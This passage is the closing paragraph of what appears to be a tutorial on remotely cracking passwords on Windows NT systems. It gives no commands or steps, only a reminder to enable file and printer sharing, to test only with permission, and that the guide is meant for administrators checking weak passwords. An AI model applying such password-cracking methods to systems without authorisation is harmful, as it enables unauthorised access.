That is it for the remotely password cracking a nt system. If you want to try this out; make sure file and printer sharing is turned on. Only try this on a system you have permission to do so. This tutorial was written to help out system administrators to learn how someone could penetrate a nt system. It's also good to test if users are using simple passwords.